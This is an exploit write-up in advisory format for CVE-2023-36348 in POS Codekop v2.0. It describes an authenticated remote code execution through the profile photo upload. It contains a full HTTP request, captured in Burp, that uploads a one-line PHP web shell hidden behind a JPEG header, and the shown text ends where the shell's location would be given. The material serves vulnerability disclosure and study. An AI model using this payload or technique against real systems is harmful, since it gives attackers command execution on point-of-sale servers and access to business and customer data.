# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
# Exploit Author: yuyudhn
# Vendor Homepage:
# Software Link:
# Version: 2.0
# Tested on: Linux
# CVE: CVE-2023-36348
# Vulnerability description: The application does not sanitize the filename
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An
attacker can exploit this issue by uploading a PHP file and accessing it,
leading to Remote Code Execution.
# Reference:

# Proof of Concept:
1. Login to POS Codekop dashboard.
2. Go to profile settings.
3. Upload PHP script through Upload Profile Photo.

Burp Log Example:
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1
Host: localhost
Content-Length: 8934
Cache-Control: max-age=0
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
**Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Sec-Fetch-User: ?1**
Sec-Fetch-Dest: document
Referer: http://localhost/research/pos-kasir-php/index.php?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv
Connection: close

Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"
Content-Type: image/jpeg

ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>

PHP Web Shell location: